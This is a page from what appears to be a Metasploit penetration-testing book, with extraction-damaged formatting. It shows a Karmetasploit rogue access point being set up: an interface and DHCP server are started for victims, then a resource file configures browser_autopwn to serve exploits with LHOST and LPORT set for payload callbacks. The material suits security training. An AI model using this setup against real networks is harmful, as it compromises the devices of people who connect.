background image

180

Chapter 12

Next, we turn on the 

at0

 interface and start the DHCP server:

root@bt:/opt/metasploit3/msf3# 

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

root@bt:/opt/metasploit3/msf3# 

dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

. . . SNIP . . .

Wrote 0 leases to leases file.
Listening on LPF/at0/00:21:29:e2:de:14/10.0.0/24
Sending on   LPF/at0/00:21:29:e2:de:14/10.0.0/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.

root@bt:/opt/metasploit3/msf3# 

ps aux |grep dhcpd

dhcpd     4015  0.0  0.2   3812  1840 ?        Ss   14:09   0:00 dhcpd3 -cf /etc/dhcp3/

dhcpd.conf at0

root      4017  0.0  0.0   2012   564 pts/4    S+   14:09   0:00 grep dhcpd

root@bt:/opt/metasploit3/msf3# tail 

tail -f /var/log/messages

Apr  2 14:06:57 bt kernel: device mon0 entered promiscuous mode
Apr  2 14:09:30 bt dhcpd: Internet Systems Consortium DHCP Server V3.1.1
Apr  2 14:09:30 bt kernel: warning: `dhcpd3' uses 32-bit capabilities (legacy support in use)
Apr  2 14:09:30 bt dhcpd: Copyright 2004-2008 Internet Systems Consortium.
Apr  2 14:09:30 bt dhcpd: All rights reserved.
Apr  2 14:09:30 bt dhcpd: For info, please visit http://www.isc.org/sw/dhcp/
Apr  2 14:09:30 bt dhcpd: Wrote 0 leases to leases file.
Apr  2 14:09:30 bt dhcpd: Listening on LPF/at0/00:21:29:e2:de:14/10.0.0/24
Apr  2 14:09:30 bt dhcpd: Sending on   LPF/at0/00:21:29:e2:de:14/10.0.0/24

The 

at0

 interface is turned on using the IP address of 

10.0.0.1

 shown at  , 

and the DHCP server is started using the configuration file we created earlier, 
also using 

at0

 as shown at  . To make sure that the DHCP server is running, 

we run a quick 

ps aux

 at  . Finally, we tail the 

messages

 log file at   to see when 

IP addresses are being handed out.

Now that the entire Karmetasploit configuration is complete, we can 

load the resource file from within 

msfconsole

 using 

resource karma.rc

 as shown 

next. (Note that we can also pass the resource file to 

msfconsole

 via the com-

mand line by entering 

msfconsole -r karma.rc

.) Let’s see it in action:

msf > 

resource karma.rc

resource (karma.rc)> 

db_connect postgres:toor@127.0.0.1/msfbook

resource (karma.rc)> 

use auxiliary/server/browser_autopwn

resource (karma.rc)> 

setg AUTOPWN_HOST 10.0.0.1

AUTOPWN_HOST => 10.0.0.1
resource (karma.rc)> 

setg AUTOPWN_PORT 55550

AUTOPWN_PORT => 55550
resource (karma.rc)> 

setg AUTOPWN_URI /ads

AUTOPWN_URI => /ads

resource (karma.rc)> 

set LHOST 10.0.0.1

LHOST => 10.0.0.1
resource (karma.rc)> 

set LPORT 45000

LPORT => 45000
resource (karma.rc)> 

set SRVPORT 55550

SRVPORT => 55550
resource (karma.rc)> 

set URIPATH /ads